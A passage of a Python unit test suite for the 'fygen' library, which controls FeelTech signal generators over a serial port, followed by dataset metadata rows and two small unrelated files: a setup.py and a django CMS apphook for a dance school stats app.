    expected = 'WMD50.0\n' + 'WFD90.0\n'
    self.assertEqual(expected, self.output.getvalue())

def test_duty_cycle_already_set(self):
    """Setting a duty cycle that is already set issues only a read."""
    fake_port = FakeSerial([b'10500\n'])
    gen = fygen.FYGen(port=fake_port, init_state=False)
    gen.is_serial = True
    gen.read_before_write = True
    gen.set(0, duty_cycle=0.105)
    self.assertEqual('RMD\n', fake_port.getvalue())

def test_duty_cycle_too_low(self):
    """A duty cycle of zero must be rejected."""
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set, duty_cycle=0)

def test_duty_cycle_too_high(self):
    """A duty cycle of one must be rejected."""
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set, duty_cycle=1)
def test_offset_volts(self):
    """Sets the offset voltage on both channels."""
    self.fy.set(offset_volts=1.5)
    self.fy.set(channel=1, offset_volts=-1.6)
    # WMO/WFO carry the first/second channel offset-voltage writes.
    self.assertEqual(
        'WMO1.50\n'
        'WFO-1.60\n',
        self.output.getvalue())

def test_offset_volts_already_set(self):
    """Tries to set the offset voltage to a value already set."""
    # Device reports 12340 (12.34 V scaled by 1000); only the read
    # command (RMO) should be issued, no redundant write.
    fs = FakeSerial([b'12340\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, offset_volts=12.34)
    self.assertEqual('RMO\n', fs.getvalue())

def test_offset_volts_too_low(self):
    """Tries to set the offset voltage too low."""
    fy = fygen.FYGen(port=self.output, min_volts=-1.5, init_state=False)
    with self.assertRaises(fygen.InvalidVoltageOffsetError):
        fy.set(offset_volts=-1.6)

def test_offset_volts_too_high(self):
    """Tries to set the offset voltage too high."""
    fy = fygen.FYGen(port=self.output, max_volts=1.5, init_state=False)
    with self.assertRaises(fygen.InvalidVoltageOffsetError):
        fy.set(offset_volts=1.6)
def test_phase(self):
    """Sets the phase on both channels."""
    self.fy.set(phase_degrees=10)
    self.fy.set(channel=1, phase_degrees=380.3)
    # 380.3 degrees wraps around to 20.3 degrees.
    expected = (
        'WMP10.000\n'
        'WFP20.300\n')
    self.assertEqual(expected, self.output.getvalue())

def test_phase_already_set(self):
    """Setting a phase that is already set issues only a read."""
    fake_port = FakeSerial([b'189300\n'])
    gen = fygen.FYGen(port=fake_port, init_state=False)
    gen.is_serial = True
    gen.read_before_write = True
    gen.set(0, phase_degrees=189.3)
    self.assertEqual('RMP\n', fake_port.getvalue())
def test_set_modulation(self):
    """Tries every known combination of modulation and trigger."""
    # Modulation modes map to WPF0..WPF6 in the order below.
    self.fy.set_modulation(mode=fygen.MODULATION_FSK)
    self.fy.set_modulation(mode=fygen.MODULATION_ASK)
    self.fy.set_modulation(mode=fygen.MODULATION_PSK)
    self.fy.set_modulation(mode=fygen.MODULATION_BURST)
    self.fy.set_modulation(mode=fygen.MODULATION_AM)
    self.fy.set_modulation(mode=fygen.MODULATION_FM)
    self.fy.set_modulation(mode=fygen.MODULATION_PM)
    # Trigger sources map to WPM0..WPM3; note EXTERNAL_AC and EXTERNAL_IN
    # both emit WPM1.
    self.fy.set_modulation(trigger=fygen.TRIGGER_CH2)
    self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_AC)
    self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_IN)
    self.fy.set_modulation(trigger=fygen.TRIGGER_MANUAL)
    self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_DC)
    # Scalar modulation parameters.
    self.fy.set_modulation(burst_count=76)
    self.fy.set_modulation(am_attenuation=0.121)
    self.fy.set_modulation(pm_bias_degrees=23.4)
    # Hop (WFK) and FM bias (WFM) frequencies are sent as 14-digit uHz
    # fields, so 1234 Hz becomes 00001234000000.
    self.fy.set_modulation(hop_freq_hz=1234)
    self.fy.set_modulation(hop_freq_uhz=1234)
    self.fy.set_modulation(fm_bias_freq_hz=1234)
    self.fy.set_modulation(fm_bias_freq_uhz=1234)
    self.assertEqual(
        'WPF0\n'
        'WPF1\n'
        'WPF2\n'
        'WPF3\n'
        'WPF4\n'
        'WPF5\n'
        'WPF6\n'
        'WPM0\n'
        'WPM1\n'
        'WPM1\n'
        'WPM2\n'
        'WPM3\n'
        'WPN76\n'
        'WPR12.1\n'
        'WPP23.4\n'
        'WFK00001234000000\n'
        'WFK00000000001234\n'
        'WFM00001234000000\n'
        'WFM00000000001234\n',
        self.output.getvalue())
def test_invalid_modulation_mode(self):
    """Modulation modes outside the supported range must be refused."""
    self.assertRaises(
        fygen.InvalidModulationModeError, self.fy.set_modulation, mode=-1)
    self.assertRaises(
        fygen.InvalidModulationModeError, self.fy.set_modulation, mode=7)

def test_invalid_burst_cycle_count(self):
    """A burst cycle count of zero must be refused."""
    self.assertRaises(
        fygen.InvalidBurstCycleCountError,
        self.fy.set_modulation,
        burst_count=0)

def test_invalid_trigger_mode(self):
    """Trigger modes outside the supported range must be refused."""
    self.assertRaises(
        fygen.InvalidTriggerModeError, self.fy.set_modulation, trigger=-1)
    self.assertRaises(
        fygen.InvalidTriggerModeError, self.fy.set_modulation, trigger=4)

def test_invalid_am_attenuation(self):
    """AM attenuation outside the valid range must be refused."""
    self.assertRaises(
        fygen.InvalidAMAttenuationError,
        self.fy.set_modulation,
        am_attenuation=-0.1)
    self.assertRaises(
        fygen.InvalidAMAttenuationError,
        self.fy.set_modulation,
        am_attenuation=2.1)

def test_invalid_hop_frequency(self):
    """Negative or doubly-specified hop frequencies must be refused."""
    self.assertRaises(
        fygen.InvalidFrequencyError, self.fy.set_modulation, hop_freq_hz=-0.1)
    self.assertRaises(
        fygen.InvalidFrequencyError, self.fy.set_modulation, hop_freq_uhz=-0.1)
    self.assertRaises(
        fygen.InvalidFrequencyError,
        self.fy.set_modulation,
        hop_freq_hz=1,
        hop_freq_uhz=1)

def test_invalid_fm_bias_frequency(self):
    """Negative or doubly-specified FM bias frequencies must be refused."""
    self.assertRaises(
        fygen.InvalidFrequencyError,
        self.fy.set_modulation,
        fm_bias_freq_hz=-0.1)
    self.assertRaises(
        fygen.InvalidFrequencyError,
        self.fy.set_modulation,
        fm_bias_freq_uhz=-0.1)
    self.assertRaises(
        fygen.InvalidFrequencyError,
        self.fy.set_modulation,
        fm_bias_freq_hz=1,
        fm_bias_freq_uhz=1)
def test_get_enable(self):
    """Gets the current enable status."""
    # 255 decodes to enabled, 0 to disabled.
    fs = FakeSerial([b'255\n', b'0\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(True, fy.get(0, 'enable'))
    self.assertEqual(False, fy.get(1, 'enable'))
    # RMN reads the first channel's enable state, RFN the second's.
    self.assertEqual('RMN\nRFN\n', fs.getvalue())

def test_get(self):
    """Calls get with no arguments."""
    # Canned responses, queued in the order the parameters are read back
    # (see the expected R-commands asserted below).
    fs = FakeSerial([
        b'50000\n',  # duty cycle
        b'255\n',  # enable
        b'12345.6789\n',  # freq hz
        b'12340\n',  # offset volts
        b'189300\n',  # phase degrees
        b'123400\n',  # volts
        b'4\n',  # wave
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual({
        'duty_cycle': 0.5,
        'enable': True,
        'freq_hz': 12345,
        'offset_volts': 12.34,
        'phase_degrees': 189.3,
        'volts': 12.34,
        'wave': 'dc',
    }, fy.get())
    self.assertEqual(
        'RMD\n'
        'RMN\n'
        'RMF\n'
        'RMO\n'
        'RMP\n'
        'RMA\n'
        'RMW\n'
        '',
        fs.getvalue())
def test_get_wave(self):
    """Gets the current wave."""
    # The same raw index (4) decodes to 'dc' on channel 0 but 'tri' on
    # channel 1 -- the channels apparently use different waveform tables.
    fs = FakeSerial([b'4\n', b'4\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual('dc', fy.get(0, 'wave'))
    self.assertEqual({'wave': 'tri'}, fy.get(1, ('wave',)))
    self.assertEqual('RMW\nRFW\n', fs.getvalue())

def test_get_invalid_channel(self):
    """Tries to pass an invalid channel."""
    with self.assertRaises(fygen.InvalidChannelError):
        self.fy.get(2, 'wave')

def test_get_invalid_parameter(self):
    """Tries to pass an invalid parameter."""
    with self.assertRaises(fygen.UnknownParameterError):
        self.fy.get(0, 'foo')

def test_get_invalid_waveform_index(self):
    """Unrecognized wave index is returned by the siggen."""
    fs = FakeSerial([b'100\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    with self.assertRaises(fygen.UnknownWaveformError):
        fy.get(0, 'wave')

def test_get_freq1(self):
    """Gets the frequency in Hz."""
    # Fractional Hz are truncated to an integer.
    fs = FakeSerial([b'12345.6789\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(12345, fy.get(0, 'freq_hz'))
    self.assertEqual('RMF\n', fs.getvalue())

def test_get_freq2(self):
    """Gets the frequency in uHz."""
    # 12345.6789 Hz -> 12345678900 uHz.
    fs = FakeSerial([b'12345.6789\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(12345678900, fy.get(1, 'freq_uhz'))
    self.assertEqual('RFF\n', fs.getvalue())

def test_get_volts(self):
    """Gets the amplitude voltage."""
    # Raw amplitude is volts scaled by 10000 (123400 -> 12.34 V).
    fs = FakeSerial([b'123400\n', b'5000\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(12.34, fy.get(0, 'volts'))
    self.assertEqual(0.5, fy.get(1, 'volts'))
    self.assertEqual('RMA\nRFA\n', fs.getvalue())

def test_get_offset_volts(self):
    """Gets the offset voltage."""
    # Negative offsets come back as unsigned 32-bit values:
    # 2**32 - 4294962296 == 5000 -> -5.0 V.
    fs = FakeSerial([b'12340\n', b'4294962296\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(12.34, fy.get(0, 'offset_volts'))
    self.assertEqual(-5, fy.get(1, 'offset_volts'))
    self.assertEqual('RMO\nRFO\n', fs.getvalue())

def test_get_phase_degrees(self):
    """Gets the phase angle."""
    # Raw phase is in millidegrees (189300 -> 189.3 degrees).
    fs = FakeSerial([b'0\n', b'189300\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(0, fy.get(0, 'phase_degrees'))
    self.assertEqual(189.3, fy.get(1, 'phase_degrees'))
    self.assertEqual('RMP\nRFP\n', fs.getvalue())

def test_get_duty_cycle(self):
    """Gets the duty cycle."""
    # Raw duty cycle is a fraction scaled by 100000 (50000 -> 0.5).
    fs = FakeSerial([b'50000\n', b'10500\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(0.5, fy.get(0, 'duty_cycle'))
    self.assertEqual(0.105, fy.get(1, 'duty_cycle'))
    self.assertEqual('RMD\nRFD\n', fs.getvalue())
def test_set_waveform(self):
    """Sets a custom waveform from normalized float samples."""
    samples = [-1.0, 0.0, 1.0, 0.0] * 2048
    self.fy.set_waveform(5, values=samples)
    expected = 'DDS_WAVE5\n' + '00000020FF3F002000000020FF3F0020\n' * 1024
    self.assertEqual(expected, self.output.getvalue())

def test_set_raw_waveform(self):
    """Sets a custom waveform using raw integer values."""
    samples = [1, 2, 3, 4] * 2048
    self.fy.set_waveform(6, raw_values=samples)
    expected = 'DDS_WAVE6\n' + '01000200030004000100020003000400\n' * 1024
    self.assertEqual(expected, self.output.getvalue())

def test_bad_waveform_index(self):
    """Waveform index 0 must be refused."""
    self.assertRaises(
        fygen.UnknownWaveformError,
        self.fy.set_waveform, 0, raw_values=[0] * 8192)

def test_raw_value_conflict_error(self):
    """Passing both values and raw_values must be refused."""
    self.assertRaises(
        fygen.RawValueConflictError,
        self.fy.set_waveform, 1, values=[0.0] * 8192, raw_values=[0] * 8192)

def test_value_count_error(self):
    """Arrays that are not exactly 8192 samples must be refused."""
    self.assertRaises(
        fygen.ValueCountError,
        self.fy.set_waveform, 1, raw_values=[0] * 8191)
    self.assertRaises(
        fygen.ValueCountError,
        self.fy.set_waveform, 1, values=[0.0] * 8191)

def test_cmd_noack_error(self):
    """Simulates the siggen not acknowledging the DDS_WAVE request."""
    fake_port = FakeSerial([b'0\n', b'0\n', b'E\n'])
    gen = fygen.FYGen(port=fake_port)
    gen.is_serial = True
    self.assertRaises(
        fygen.CommandNotAcknowledgedError,
        gen.set_waveform, 1, values=[0.0] * 8192)

def test_data_noack_error(self):
    """Simulates the siggen not acknowledging data that was sent."""
    fake_port = FakeSerial([b'0\n', b'0\n', b'W\n', b'E\n'])
    gen = fygen.FYGen(port=fake_port)
    gen.is_serial = True
    self.assertRaises(
        fygen.CommandNotAcknowledgedError,
        gen.set_waveform, 1, values=[0.0] * 8192)
def test_set_sweep(self):
    """Tries every known sweep variable."""
    self.fy.set_sweep(enable=False, mode=fygen.SWEEP_FREQUENCY)
    self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE)
    self.fy.set_sweep(mode=fygen.SWEEP_OFFSET)
    self.fy.set_sweep(mode=fygen.SWEEP_DUTY_CYCLE)
    self.fy.set_sweep(log_sweep=False)
    self.fy.set_sweep(log_sweep=True)
    self.fy.set_sweep(source=fygen.SWEEP_SOURCE_TIME)
    self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN)
    self.fy.set_sweep(time_seconds=10.1)
    self.fy.set_sweep(start_freq_hz=1234.56, end_freq_hz=1234.56)
    self.fy.set_sweep(start_volts=12.3456, end_volts=12.3456)
    self.fy.set_sweep(start_offset_volts=-12.3456, end_offset_volts=-12.3456)
    self.fy.set_sweep(start_duty_cycle=0.1, end_duty_cycle=0.9)
    # Every call first disables sweeping (SBE0) before writing the
    # changed parameter.  Values are rounded to the command's fixed
    # field width; note that -12.3456 apparently comes out as SST-2.346
    # (the sign displaces a digit in the fixed-width field).
    self.assertEqual(
        'SBE0\n'
        'SOB0\n'
        'SBE0\n'
        'SOB1\n'
        'SBE0\n'
        'SOB2\n'
        'SBE0\n'
        'SOB3\n'
        'SBE0\n'
        'SMO0\n'
        'SBE0\n'
        'SMO1\n'
        'SBE0\n'
        'SXY0\n'
        'SBE0\n'
        'SXY1\n'
        'SBE0\n'
        'STI10.10\n'
        'SBE0\n'
        'SST1234.6\n'
        'SEN1234.6\n'
        'SBE0\n'
        'SST12.346\n'
        'SEN12.346\n'
        'SBE0\n'
        'SST-2.346\n'
        'SEN-2.346\n'
        'SBE0\n'
        'SST10.0\n'
        'SEN90.0\n'
        '',
        self.output.getvalue())
def test_sweep_enable(self):
    """Enabling sweep mode without the override must be refused."""
    self.assertRaises(
        fygen.PossibleFirmwareBugError, self.fy.set_sweep, enable=True)

def test_sweep_enable_forced(self):
    """Enabling sweep mode works once force_sweep_enable is set."""
    gen = fygen.FYGen(port=self.output)
    gen.force_sweep_enable = True
    gen.set_sweep(enable=True)
    self.assertEqual('SBE1\n', self.output.getvalue())

def test_invalid_sweep_mode(self):
    """An out-of-range sweep mode must be refused."""
    self.assertRaises(fygen.InvalidSweepModeError, self.fy.set_sweep, mode=5)

def test_invalid_sweep_source(self):
    """An out-of-range sweep source must be refused."""
    self.assertRaises(
        fygen.InvalidSweepSourceError, self.fy.set_sweep, source=2)

def test_sweep_vco_with_time(self):
    """A sweep time combined with the VCO source must be refused."""
    self.assertRaises(
        fygen.InvalidSweepSourceError,
        self.fy.set_sweep,
        source=fygen.SWEEP_SOURCE_VCO_IN,
        time_seconds=1)

def test_invalid_sweep_time(self):
    """A zero sweep time must be refused."""
    self.assertRaises(
        fygen.InvalidSweepTimeError, self.fy.set_sweep, time_seconds=0)

def test_sweep_start_freq_in_invalid_mode(self):
    """start_freq_hz is invalid in amplitude sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_AMPLITUDE,
        start_freq_hz=1000)

def test_invalid_start_freq(self):
    """A start frequency of zero must be refused."""
    self.assertRaises(
        fygen.InvalidFrequencyError, self.fy.set_sweep, start_freq_hz=0)

def test_sweep_end_freq_in_invalid_mode(self):
    """end_freq_hz is invalid in amplitude sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_AMPLITUDE,
        end_freq_hz=1000)

def test_invalid_end_freq(self):
    """An end frequency of zero must be refused."""
    self.assertRaises(
        fygen.InvalidFrequencyError, self.fy.set_sweep, end_freq_hz=0)

def test_sweep_start_volts_in_invalid_mode(self):
    """start_volts is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        start_volts=10)

def test_invalid_start_volts(self):
    """Zero and over-limit start voltages must be refused."""
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, start_volts=0)
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, start_volts=30)

def test_sweep_end_volts_in_invalid_mode(self):
    """end_volts is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        end_volts=10)

def test_invalid_end_volts(self):
    """Zero and over-limit end voltages must be refused."""
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, end_volts=0)
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, end_volts=30)

def test_sweep_start_offset_volts_in_invalid_mode(self):
    """start_offset_volts is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        start_offset_volts=10)

def test_invalid_start_offset_volts(self):
    """An over-limit start offset voltage must be refused."""
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, start_offset_volts=30)

def test_sweep_end_offset_volts_in_invalid_mode(self):
    """end_offset_volts is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        end_offset_volts=10)

def test_invalid_end_offset_volts(self):
    """An over-limit end offset voltage must be refused."""
    self.assertRaises(
        fygen.InvalidVoltageError, self.fy.set_sweep, end_offset_volts=30)

def test_sweep_start_duty_cycle_in_invalid_mode(self):
    """start_duty_cycle is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        start_duty_cycle=0.1)

def test_invalid_start_duty_cycle(self):
    """Start duty cycles of zero and one must be refused."""
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set_sweep, start_duty_cycle=0)
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set_sweep, start_duty_cycle=1)

def test_sweep_end_duty_cycle_in_invalid_mode(self):
    """end_duty_cycle is invalid in frequency sweep mode."""
    self.assertRaises(
        fygen.InvalidModeError,
        self.fy.set_sweep,
        mode=fygen.SWEEP_FREQUENCY,
        end_duty_cycle=0.9)

def test_invalid_end_duty_cycle(self):
    """End duty cycles of zero and one must be refused."""
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set_sweep, end_duty_cycle=0)
    self.assertRaises(
        fygen.InvalidDutyCycleError, self.fy.set_sweep, end_duty_cycle=1)
def test_set_measurement(self):
    """Tests all combinations of set_measurement."""
    self.fy.set_measurement(reset_counter=True)
    self.fy.set_measurement(pause=False)
    self.fy.set_measurement(pause=True)
    self.fy.set_measurement(gate_time=fygen.GATE_TIME_1S)
    self.fy.set_measurement(gate_time=fygen.GATE_TIME_10S)
    self.fy.set_measurement(gate_time=fygen.GATE_TIME_100S)
    self.fy.set_measurement(coupling=fygen.COUPLING_DC)
    self.fy.set_measurement(coupling=fygen.COUPLING_AC)
    # WCZ = counter reset, WCP = pause flag (pause=False -> WCP1,
    # pause=True -> WCP0), WCG = gate time, WCC = coupling.
    self.assertEqual(
        'WCZ0\n'
        'WCP1\n'
        'WCP0\n'
        'WCG0\n'
        'WCG1\n'
        'WCG2\n'
        'WCC1\n'
        'WCC0\n',
        self.output.getvalue())

def test_set_measurement_invalid_gate_time(self):
    """Passes an invalid gate_time."""
    with self.assertRaises(fygen.InvalidGateTimeError):
        self.fy.set_measurement(gate_time=4)

def test_set_measurement_invalid_coupling(self):
    """Passes an invalid coupling."""
    with self.assertRaises(fygen.InvalidCouplingError):
        self.fy.set_measurement(coupling=2)
def test_get_measurement(self):
    """Gets all measurements."""
    fs = FakeSerial([
        b'0\n',  # gate mode = 1S
        b'0000000668\n',  # freq_hz
        b'0000060668\n',  # period_sec
        b'0000012345\n',  # positive_width_sec
        b'0000054321\n',  # negative_width_sec
        b'0000000541\n',  # duty cycle
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    # Periods/widths are reported in nanoseconds (60668 -> 6.0668e-5 s);
    # duty cycle is scaled by 1000 (541 -> 0.541).
    self.assertEqual(
        {
            'freq_hz': 668.0,
            'period_sec': 6.0668e-5,
            'positive_width_sec': 1.2345e-5,
            'negative_width_sec': 5.4321e-5,
            'duty_cycle': 0.541
        },
        fy.get_measurement())

def test_get_measurement_counter(self):
    """Gets the counter measurement."""
    fs = FakeSerial([
        b'0000000669\n',  # counter
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual({'counter': 669}, fy.get_measurement({'counter'}))

def test_get_measurement_frequency(self):
    """Gets frequencies."""
    # The same raw count is divided by the active gate time
    # (1 s / 10 s / 100 s), so 668 reads as 668.0, 66.8 and 6.68 Hz.
    fs = FakeSerial([
        b'0\n',  # gate mode = 1S
        b'0000000668\n',  # freq_hz
        b'1\n',  # gate mode = 10S
        b'0000000668\n',  # freq_hz
        b'2\n',  # gate mode = 100S
        b'0000000668\n',  # freq_hz
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(668.0, fy.get_measurement('freq_hz'))
    self.assertEqual(66.8, fy.get_measurement('freq_hz'))
    self.assertEqual(6.68, fy.get_measurement('freq_hz'))

def test_get_measurement_invalid_gate_time(self):
    """The siggen returns an unexpected gate time mode."""
    fs = FakeSerial([
        b'x\n',  # gate mode = ???
        b'0000000668\n',  # freq_hz
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    with self.assertRaises(fygen.InvalidGateTimeError):
        fy.get_measurement('freq_hz')

def test_get_measurement_unknown_parameter(self):
    """Requests an unknown parameter."""
    with self.assertRaises(fygen.UnknownParameterError):
        self.fy.get_measurement('foo')
def test_save(self):
    """Saving parameters to slot 2 emits USN02."""
    self.fy.save(2)
    self.assertEqual('USN02\n', self.output.getvalue())

def test_load(self):
    """Loading parameters from slot 3 emits ULN03."""
    self.fy.load(3)
    self.assertEqual('ULN03\n', self.output.getvalue())

def test_set_synchronization(self):
    """Sets all known sync modes, which map to USA0..USA4 in order."""
    self.fy.set_synchronization(wave=True)
    self.fy.set_synchronization(freq=True)
    self.fy.set_synchronization(volts=True)
    self.fy.set_synchronization(offset_volts=True)
    self.fy.set_synchronization(duty_cycle=True)
    expected = ''.join('USA%d\n' % index for index in range(5))
    self.assertEqual(expected, self.output.getvalue())
def test_get_synchronization(self):
    """Gets all known sync modes."""
    # Flags read back as 255 (on) / 0 (off); responses are queued in the
    # order the modes are polled (see the RSA commands asserted below).
    fs = FakeSerial([
        b'0\n',  # duty cycle
        b'255\n',  # freq
        b'0\n',  # offset_volts
        b'255\n',  # volts
        b'0\n',  # wave
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual({
        'duty_cycle': False,
        'freq': True,
        'offset_volts': False,
        'volts': True,
        'wave': False,
    }, fy.get_synchronization())
    self.assertEqual(
        'RSA4\n'
        'RSA1\n'
        'RSA3\n'
        'RSA2\n'
        'RSA0\n'
        '',
        fs.getvalue())

def test_get_synchronization_dict(self):
    """Gets a single sync mode via a tuple, returning a dict."""
    fs = FakeSerial([
        b'255\n',  # duty cycle
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(
        {'duty_cycle': True},
        fy.get_synchronization(('duty_cycle',)))
    self.assertEqual('RSA4\n', fs.getvalue())

def test_get_synchronization_single(self):
    """Gets a single sync mode by name, returning a bare bool."""
    fs = FakeSerial([
        b'0\n',  # wave
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual(False, fy.get_synchronization('wave'))
    self.assertEqual('RSA0\n', fs.getvalue())

def test_get_invalid_sync_mode(self):
    """Gets an invalid sync mode."""
    with self.assertRaises(fygen.InvalidSynchronizationMode):
        self.fy.get_synchronization('foo')
def test_set_buzzer(self):
    """Sets the buzzer."""
    self.fy.set_buzzer(False)
    self.fy.set_buzzer(True)
    self.assertEqual('UBZ0\nUBZ1\n', self.output.getvalue())

def test_get_buzzer(self):
    """Gets buzzer state."""
    # 0 decodes to off, 255 to on.
    fs = FakeSerial([
        b'0\n',
        b'255\n',
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertFalse(fy.get_buzzer())
    self.assertTrue(fy.get_buzzer())
    self.assertEqual('RBZ\nRBZ\n', fs.getvalue())

def test_set_uplink(self):
    """Tries all set_uplink combinations."""
    self.fy.set_uplink(is_master=True, enable=False)
    self.fy.set_uplink(is_master=False, enable=True)
    # When disabling, the uplink is switched off (UUL0) before the
    # master/slave flag (UMS) is written; when enabling, the flag is
    # written first and the uplink switched on (UUL1) last.
    self.assertEqual(
        'UUL0\n'
        'UMS0\n'
        'UMS1\n'
        'UUL1\n'
        '',
        self.output.getvalue())

def test_get_uplink(self):
    """Gets uplink settings."""
    fs = FakeSerial([
        b'0\n',
        b'255\n',
        b'255\n',
    ])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual({'enable': False, 'is_master': False}, fy.get_uplink())
    self.assertTrue(fy.get_uplink('enable'))
    self.assertEqual('RUL\nRMS\nRUL\n', fs.getvalue())
def test_get_id(self):
    """Gets the device id with a UID read."""
    fake_port = FakeSerial([b'12345\n'])
    gen = fygen.FYGen(port=fake_port)
    gen.is_serial = True
    self.assertEqual('12345', gen.get_id())
    self.assertEqual('UID\n', fake_port.getvalue())

def test_get_model(self):
    """Gets the device model with a UMO read."""
    fake_port = FakeSerial([b'fy2300\n'])
    gen = fygen.FYGen(port=fake_port)
    gen.is_serial = True
    self.assertEqual('fy2300', gen.get_model())
    self.assertEqual('UMO\n', fake_port.getvalue())

def test_auto_detect_on_init(self):
    """Autodetection runs during FYGen init."""
    fake_port = FakeSerial([b'FY6900-60\n'])
    gen = fygen.FYGen(port=fake_port, _port_is_serial=True)
    self.assertEqual('fy6900', gen.device_name)
    self.assertEqual('UMO\n', fake_port.getvalue())

def test_auto_detect(self):
    """Model strings map to the matching known device names."""
    expectations = {
        'FY6900-60M': 'fy6900',
        'FY2350H': 'fy2300',
    }
    for model, device in expectations.items():
        self.assertEqual(fygen.detect_device(model), device)

def test_autodetect_no_conflict(self):
    """Make sure no exact match maps to the wrong device.

    Future-proofing in case two devices sharing a leading 4-char prefix
    but having different waveform ids are ever added.
    """
    for device in SUPPORTED_DEVICES:
        self.assertEqual(fygen.detect_device(device), device)
if __name__ == '__main__':
    # Run the whole suite when this file is executed directly.
    unittest.main()
| 31.905023 | 81 | 0.642317 | 34,626 | 0.991127 | 0 | 0 | 0 | 0 | 0 | 0 | 8,197 | 0.234629 |
a4f8e8179ce401a6630d257843d17f4bc8c551d3 | 212 | py | Python | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | 3 | 2020-06-28T15:47:02.000Z | 2021-02-14T19:25:13.000Z | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | null | null | null | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | null | null | null | from setuptools import find_packages, setup
# Packaging metadata for the POC model source tree.
setup(
    name='src',
    packages=find_packages(),  # auto-discover every package in the repo
    version='0.1.0',
    description='POC model for publication',
    author='Thomas Haine',
    license='MIT',
)
| 19.272727 | 44 | 0.665094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 58 | 0.273585 |
a4fa0f6854a007037641edd2c76faef321c93748 | 413 | py | Python | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 1 | 2019-02-04T02:11:32.000Z | 2019-02-04T02:11:32.000Z | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 2 | 2019-03-26T22:37:49.000Z | 2019-12-02T15:39:35.000Z | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 1 | 2019-03-19T22:49:01.000Z | 2019-03-19T22:49:01.000Z | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class StatsApphook(CMSApp):
    """django CMS apphook that mounts the stats app's URLs on a CMS page."""

    name = _("Stats Apphook")  # label shown when selecting the apphook

    def get_urls(self, page=None, language=None, **kwargs):
        # URLconf module(s) served at the page this apphook is attached to.
        return ["danceschool.stats.urls"] # replace this with the path to your application's URLs module


apphook_pool.register(StatsApphook)  # make the apphook selectable in the CMS
| 29.5 | 111 | 0.728814 | 234 | 0.566586 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.246973 |
a4facbc09faf96725436ab1390e2089d932160c8 | 2,577 | py | Python | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
